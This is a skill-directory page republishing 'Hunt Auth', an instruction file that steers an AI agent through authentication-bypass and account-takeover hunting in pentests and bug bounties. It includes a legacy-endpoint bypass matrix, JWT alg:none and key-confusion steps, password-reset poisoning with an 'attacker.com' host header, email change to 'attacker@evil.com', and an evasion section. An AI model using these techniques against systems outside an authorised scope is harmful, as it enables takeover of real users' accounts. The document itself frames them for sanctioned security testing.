Agent skill

Hunt Auth

by Encod3d-Sec in Encod3d-Sec/TORCH

Auth bypass and ATO hunting - legacy protocol matrix (XMLRPC, SharePoint /vtibin/, EWS, Citrix, etc.), JWT manipulation, password reset poisoning, SAML auth bypass, session fixation.

MITAuto-check passedBackend & APIs

Install Hunt Auth

skills CLI
$ npx skills add Encod3d-Sec/TORCH --skill hunt-auth -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install Encod3d-Sec/TORCH hunt-auth --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/Encod3d-Sec/TORCH.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/hunt/hunt-auth .claude/skills/hunt-auth && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
hunt-auth
GitHub stars
329
Token cost
~2.4k tokens
SKILL.md length
1,179 words
Files
1
Skills in repo
35
Repo updated
First seen
Licence
MIT

At a glance

Auth bypass and ATO hunting - legacy protocol matrix (XMLRPC, SharePoint /vtibin/, EWS, Citrix, etc.), JWT manipulation, password reset poisoning, SAML auth bypass, session fixation.

  • Works in 5 steps: Legacy protocol endpoints (matrix below)… → Password reset flows - host-header… → Session and MFA - fixation, missing… → …
  • Tasks that involve Authentication
  • SKILL.md covers Wiki, Attack surface (ranked), Legacy Protocol Matrix (Probe… and JWT Attacks, plus 7 more sections
  • Calls python3

What it does

Hunt Auth is an agent skill from Encod3d-Sec/TORCH. Auth bypass and ATO hunting - legacy protocol matrix (XMLRPC, SharePoint /vtibin/, EWS, Citrix, etc.), JWT manipulation, password reset poisoning, SAML auth bypass, session fixation. Wiki-first, FIND schema output.

Its SKILL.md is about 2.4k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.

It sits in Backend & APIs, covering Authentication and Cloud office suites. It works with Microsoft SharePoint. The repository describes itself as: Karpathy LLM based claude harness for PenetrationTesting / Bugbounty using obsidian. The licence is MIT.

When your agent uses it

  • Tasks that involve Authentication
  • Tasks that involve Cloud office suites

Example prompts

  • “/hunt-auth”

Requirements

  • Python 3

Workflow steps

5 steps, taken from the first numbered list in SKILL.md.

  1. Legacy protocol endpoints (matrix below) - a second door to the same credential store, frequently with no rate limit, MFA, or CAPTCHA…
  2. Password reset flows - host-header poisoning, token in Referer, token reuse/expiry, reset that does not invalidate live sessions.
  3. Session and MFA - fixation, missing rotation on privilege change, MFA-optional endpoints, JWT manipulation.
  4. Read the login form's fields, not just the endpoint. A login that takes username only, no password field is instant ATO - just submit the…
  5. Predictable/leaked signing key -> forge as any user. When auth or a "signed message" rests on a per-user key, hunt for a /debug, docs, or…

What it can do on your machine

Read from SKILL.md and the folder at commit d21b6c9. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Shell commands in SKILL.md call:

    • python3

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    No URLs in SKILL.md.

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Hunt Auth loads about 2.4k tokens when it runs. Until then it costs about 57 tokens; SKILL.md has 1,179 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~57
When it runs · the whole SKILL.md, loaded when a task matches
~2.4k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from Encod3d-Sec/TORCH at commit d21b6c9, republished under its MIT licence (© Encod3d-Sec). 1,179 words, ~2,406 tokens.

Download SKILL.mdSave it as .claude/skills/hunt-auth/SKILL.md (or your agent's skills folder).
name
hunt-auth
description
Auth bypass and ATO hunting - legacy protocol matrix (XMLRPC, SharePoint /_vti_bin/, EWS, Citrix, etc.), JWT manipulation, password reset poisoning, SAML auth bypass, session fixation. Wiki-first, FIND schema output.

Hunt: Auth Bypass & Account Takeover

Assumes hunt-core for the scope gate, two-account rule, confirmation gate, enumeration limits, stop conditions, wiki protocol, FIND output, and Deadends. Do not re-derive any of that here.

Wiki

qmd_query "authentication bypass account takeover password reset poisoning session fixation legacy protocol" via wiki-search MCP

Hub: [[web-moc]] (live index). Primary page: [[authentication-attacks]]. Payload arsenal: wiki/payloads/{auth-bypass,jwt,oauth-saml,session,mfa-bypass,crypto}.md. Anchors: [[session-management-attacks]], [[mfa-bypass]].

Attack surface (ranked)

Probe in this order; a higher entry is more often unguarded than a cleverer payload on the main form is likely to land.

  1. Legacy protocol endpoints (matrix below) - a second door to the same credential store, frequently with no rate limit, MFA, or CAPTCHA. Probe first on any custom/branded login.
  2. Password reset flows - host-header poisoning, token in Referer, token reuse/expiry, reset that does not invalidate live sessions.
  3. Session and MFA - fixation, missing rotation on privilege change, MFA-optional endpoints, JWT manipulation.
  4. Read the login form's fields, not just the endpoint. A login that takes username only, no password field is instant ATO - just submit the privileged/target username (custom auth on a CTF/lab app does this constantly). Same for a "just email"/"just token" form with no secret.
  5. Predictable/leaked signing key -> forge as any user. When auth or a "signed message" rests on a per-user key, hunt for a /debug, docs, or /about endpoint (or source) that discloses the key-derivation (deterministic seed like f(username, CONST), nextprime(int(SHA256(seed)))). If the derivation is known, reconstruct the private key offline and forge signatures/sessions/JWTs for admin - no factoring, modulus size irrelevant. Build + oracle-brute steps in [[cryptography-attacks]] ("RSA private key from a known/deterministic seed").

Legacy Protocol Matrix (Probe First on Any Custom-Branded Login)

When a target has a custom/branded login UI, ALWAYS probe the platform's legacy protocol endpoints. These often accept native credentials with NO rate limit, NO MFA, NO CAPTCHA.

Target techLegacy endpointBypass surface
WordPress/xmlrpc.phpNative WP creds; bypasses SSO, MFA, IP-allow on /wp-login.php
SharePoint/_vti_bin/Authentication.asmxSOAP Login op; FedAuth cookie returned; no rate limit observed
SharePoint REST/_api/contextinfo (POST)Anonymous FormDigest issuance
Atlassian Jira/Confluence/rest/auth/1/sessionNative creds accepted even when Atlassian Access SSO enforced on UI
Exchange / OWA/EWS/Exchange.asmx, /Microsoft-Server-ActiveSyncNTLM/Basic; bypasses OWA MFA restrictions
Citrix NetScaler/vpn/index.html, /cgi/loginNative AD credentials independent of MFA wrappers
F5 BIG-IP/mgmt/tm/util/bash, /tmui/login.jspNative admin creds
Spring Boot/actuator/*Sometimes anonymously enumerable
Jenkins/jnlpJars/jenkins-cli.jar, /scriptAPI tokens + native auth
Apache Tomcat/manager/htmlNative Tomcat realm creds
Drupal/user/login?_format=jsonJSON POST accepts native passwords independent of SSO middleware
Generic ASP.NET*.asmx?WSDL, trace.axd, elmah.axdEach ASMX may take creds independently

How to use:

  1. Identify tech stack from headers/paths
  2. Probe legacy endpoint anonymously (confirm reachable, not 403/404)
  3. Test with synthetic credentials - confirm differential (success vs failure)
  4. Verify NO rate limit against a synthetic or your OWN test account (never a real user - every failed attempt counts toward account lockout): send a bounded burst - 5 by default per hunt-core, 20 ceiling with operator approval, 0 under no_bruteforce - and confirm uniform timing, no 429, no lockout counter. The ABSENCE of the limit is the finding; do not actually brute-force to prove it.
  5. Confirmed when the endpoint takes native creds with no rate limit / MFA / CAPTCHA (severity below).

JWT Attacks

bash
# 1. Decode JWT
echo "HEADER.PAYLOAD.SIGNATURE" | cut -d. -f2 | base64 -d 2>/dev/null | python3 -m json.tool

# 2. Test none algorithm
# Change "alg":"RS256" -> "alg":"none", remove signature
eyJhbGciOiJub25lIn0.PAYLOAD.

# 3. HS256/RS256 key confusion
# If RS256, try signing with public key as HS256 secret

ATO Attack Paths (Priority Order)

  1. Password reset poisoning: POST /forgot-password with X-Forwarded-Host: attacker.com -> reset link sent to attacker
  2. Reset token in Referer leak: reset page loads external analytics -> full Referer with token leaked
  3. Email change without re-auth: PUT /api/user/email {"new_email": "attacker@evil.com"} without current_password
  4. Session fixation: set session cookie before auth -> persists after login
  5. IDOR -> ATO chain: PATCH /api/users/{victim_uid} with attacker session -> change victim email -> reset password

Methodology

  1. Map all authentication entry points (main, admin, API, partner, mobile)
  2. Identify auth mechanism per entry (forms, SAML, OAuth, API key, session)
  3. Test legacy endpoints per tech stack (use matrix above)
  4. Probe XMLRPC if WordPress: system.listMethods, wp.getUsersBlogs
  5. Test JWT if present: none algorithm, key confusion, weak secret
  6. Test password reset: host header injection, token in Referer, token reuse after expiry
  7. Test email change: no re-auth, no confirmation 7a. On a legacy PHP/MySQL stack (old Apache/PHP banner) with self-registration, try SQL truncation to forge a duplicate of a privileged username (register admin+spaces+junk, log in as admin/yourpass) - see [[authentication-attacks]] "SQL Truncation Duplicate-Account Auth Bypass".
  8. Verify impact: demonstrate full ATO on test account B from attacker session A, then clear the confirmation gate below
  9. Distill when confirmed (per hunt-core): a reusable legacy-endpoint bypass or JWT variant, GENERIC (no client host): python3 scripts/wiki-stage.py --kind technique --slug <slug> --target-page techniques/web/authentication-attacks.md
Show full SKILL.md (438 more words)Show less

Drive it through Burp

Push the load-bearing requests through Burp for operator visibility (Skill(hunt-burp)):

  • The password-reset request with the injected X-Forwarded-Host / Host, and each JWT-tampered request (alg:none, key-confusion), go to Repeater so the operator can replay and inspect them.
  • The bounded rate-limit / lockout probe (matrix step 4) goes to Intruder with the hunt-core bound, never a hand-rolled loop.
  • scripts/capture.sh burp grabs the request+response PoC the moment it lands.

Confirmation gate

NOT confirmation: a 200 on the login page or reset form; a different or friendlier error message; a password-reset email merely received; a JWT that decodes cleanly or whose alg/claims you edited and the server did not reject; a legacy endpoint that returns 200 to an anonymous probe; the server "accepting" a modified token without acting on it.

IS confirmation: an authenticated session obtained as a different user - exercise a capability only that account has - OR a reset token that actually resets another account's password and lets you log in as them. Reproduced from scratch in a clean session (fresh profile, no cached cookies) per hunt-core, with your own account ruled out as the thing you logged into.

Chaining

  • Reset poisoning / token leak -> ATO. A host-header or Referer-leaked reset token completes a full victim takeover - report the chain, not the leak alone.
  • Trusted JWT claim -> ATO. A sub/user_id the server trusts plus a weak or strippable signature is arbitrary account takeover.
  • Hand off hunt-federation for SSO/OAuth/SAML redirect_uri, state CSRF, and XSW signature attacks; this skill covers the SAML auth-bypass surface only.
  • Hand off hunt-idor for the trusted-identifier overlap - a PATCH /users/{victim} that rewrites a victim email is an IDOR that chains straight back here to reset-based ATO (ATO path 5).

Evasion

When the primary login rate-limits or enforces MFA, the bypass is usually a different entry point to the same credential store, not a cleverer payload: the legacy endpoints above, an alternate host (mobile/partner/API), an older API version, or a SOAP/JSON variant of the same auth call. For a hardened reset flow, vary the host-header injection vector (X-Forwarded-Host, dual Host headers, absolute-URI request line) rather than repeating one form.

Severity

Rated on demonstrated impact (per hunt-core), not the mechanism.

ConditionTypical
Auth bypass reaching an authenticated context with no credentialscritical
Full ATO of a victim account (reset poisoning, trusted-JWT claim, session fixation)critical / high
Full ATO requiring one victim clickhigh
Unlimited credential brute-force endpoint confirmed (legacy protocol, no rate limit)critical / high
Legacy endpoint reachable, accepts native creds, no rate limit, no creds tested yetmedium

Unauthenticated outranks authenticated. A precondition you cannot satisfy (a victim click, a cred list you do not hold) lowers it.

© Encod3d-Sec, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

Just SKILL.md in skills/hunt/hunt-auth of Encod3d-Sec/TORCH.

Open the folder on GitHubat commit d21b6c9

Compare with similar skills

Hunt Auth next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Hunt Auth compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Hunt Auth this skillEncod3d-Sec/TORCH329—~2.4kAutomated safety check: PassMIT
Sap Btp Build Work Zone Advancedsecondsky/sap-skills462—~3.3kAutomated safety check: PassGPL-3.0
Implementing Google Workspace Sso Configurationmukul975/Anthropic-Cybersecurity-Skills34k—~2kAutomated safety check: PassApache-2.0
Identity Access Managementsickn33/agentic-awesome-skills47k1 repos~2.9kAutomated safety check: PassMIT
Cursor Sso Integrationjeremylongshore/tons-of-skills-marketplace2.8k—~2kAutomated safety check: PassMIT
Msgraph SDKgithub/awesome-copilot40k—~2.1kAutomated safety check: PassMIT

Similar skills

  • Develops and administers SAP Build Work Zone, advanced edition digital workplace solutions.

    462 GitHub stars~3.3k tokensUpdated 4 days ago
    Backend & APIsAuto-check passed
  • Implementing Google Workspace Sso Configuration

    mukul975/Anthropic-Cybersecurity-Skills

    Configures SAML 2.0 single sign-on for Google Workspace against a third-party identity provider (Okta, Azure AD/Entra ID, ADFS), with Workspace as the Service Provider, to centralize authentication…

    34k GitHub stars~2k tokensUpdated 1 mo ago
    Backend & APIsAuto-check passed
  • Identity Access Management

    sickn33/agentic-awesome-skills

    Set up and manage SSO, SCIM provisioning, and MFA for startup teams using Google Workspace, Okta, or Azure AD.

    47k GitHub starsUsed in 1 repo~2.9k tokens
    Backend & APIsAuto-check passed
  • Cursor Sso Integration

    jeremylongshore/tons-of-skills-marketplace

    Configure SAML 2.0 and OIDC SSO for Cursor with Okta, Microsoft Entra ID, and Google Workspace.

    2.8k GitHub stars~2k tokensUpdated today
    Backend & APIsAuto-check passed
  • Msgraph SDK

    github/awesome-copilot

    Official

    Integrate Microsoft Graph SDK into any project — .NET, TypeScript/JavaScript, or Python.

    40k GitHub stars~2.1k tokensUpdated today
    Documents & OfficeAuto-check passed
  • CLI Microsoft365

    pnp/cli-microsoft365-mcp-server

    Use CLI for Microsoft 365 to manage Microsoft 365 tenants from the terminal.

    132 GitHub stars~3.5k tokensUpdated 3 days ago
    Documents & OfficeAuto-check passed

More from Encod3d-Sec/TORCH

All 35 skills in this repo
  • Runs a bug-bounty engagement through a script that tracks the current pass, builds a board of rows from recon and prints the next required action each turn.

    329 GitHub stars~1.8k tokensUpdated 1 mo ago
    Auto-check passed
  • Checks that the bb, pt and ctf workflow driver is set up correctly on a machine: vault content, skill symlinks, hooks, imports and a live smoke test, with fixes for failures.

    329 GitHub stars~611 tokensUpdated 1 mo ago
    Auto-check passed
  • Opens a visible Chromium window on a Kali VM so an operator can complete a manual login or CAPTCHA while the agent watches and acts through the chrome-devtools MCP.

    329 GitHub stars~1.2k tokensUpdated 1 mo ago
    Auto-check passed
  • CTF Campaign Driver

    Encod3d-Sec/TORCH

    Runs a capture-the-flag box from first scan to root with a driver script that tracks progress and prints the next action each turn.

    329 GitHub stars~1.8k tokensUpdated 1 mo ago
    Auto-check passed
  • Decides when a main pentesting agent should hand a fully-specified, mechanical exploit-compile or privilege-escalation step to a cheaper sub-agent, and how to specify that handoff safely.

    329 GitHub stars~1.6k tokensUpdated 1 mo ago
    Auto-check: notes
  • Adaptive Web Fuzzing

    Encod3d-Sec/TORCH

    Adaptive web fuzzing for pentests, bug bounty and CTF work: picks the smallest suitable SecLists wordlist per target surface and calibrates filters against soft-404 responses.

    329 GitHub stars~1.3k tokensUpdated 1 mo ago
    Auto-check passed

Categories

Questions about Hunt Auth

What does Hunt Auth do?

Auth bypass and ATO hunting - legacy protocol matrix (XMLRPC, SharePoint /vtibin/, EWS, Citrix, etc.), JWT manipulation, password reset poisoning, SAML auth bypass, session fixation. Hunt Auth is an agent skill from Encod3d-Sec/TORCH.), JWT manipulation, password reset poisoning, SAML auth bypass, session fixation.

When should I use Hunt Auth?

Hunt Auth fits situations like: tasks that involve Authentication; tasks that involve Cloud office suites.

How do I install Hunt Auth in Claude Code?

Run `npx skills add Encod3d-Sec/TORCH --skill hunt-auth -a claude-code`. Or copy the skill folder (skills/hunt/hunt-auth in Encod3d-Sec/TORCH) into .claude/skills/hunt-auth in your project. Claude Code loads it when a task matches its description.

How do I install Hunt Auth in Codex?

Run `npx skills add Encod3d-Sec/TORCH --skill hunt-auth -a codex`. Or copy the skill folder (skills/hunt/hunt-auth in Encod3d-Sec/TORCH) into .agents/skills/hunt-auth in your project. Codex loads it when a task matches its description.

Can I use Hunt Auth in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add Encod3d-Sec/TORCH --skill hunt-auth -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/hunt-auth, .gemini/skills/hunt-auth, .github/skills/hunt-auth and .opencode/skills/hunt-auth in your project.

What does Hunt Auth need to run?

Going by SKILL.md and its folder, Hunt Auth needs the command-line tools its instructions call (python3). Our summary lists: Python 3.

Does Hunt Auth access the network?

SKILL.md contains no URLs. Any network use would come from the scripts or tools the agent runs. This is read from the text; nothing was executed.

Is Hunt Auth safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.

What licence does Hunt Auth use?

Hunt Auth is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Hunt Auth use?

About 2.4k tokens (SKILL.md is roughly 9.6k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.

What are the alternatives to Hunt Auth?

Skills that share tags, products or a category with Hunt Auth: Sap Btp Build Work Zone Advanced (secondsky/sap-skills, 462 stars), Implementing Google Workspace Sso Configuration (mukul975/Anthropic-Cybersecurity-Skills, 34k stars), Identity Access Management (sickn33/agentic-awesome-skills, 47k stars) and Cursor Sso Integration (jeremylongshore/tons-of-skills-marketplace, 2.8k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Hunt Auth?

Encod3d-Sec (a GitHub user) maintains it in Encod3d-Sec/TORCH, which has 329 GitHub stars. The repository holds 35 skills in this directory. The repository was last updated on September 1, 2026.

Source: Encod3d-Sec/TORCH on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.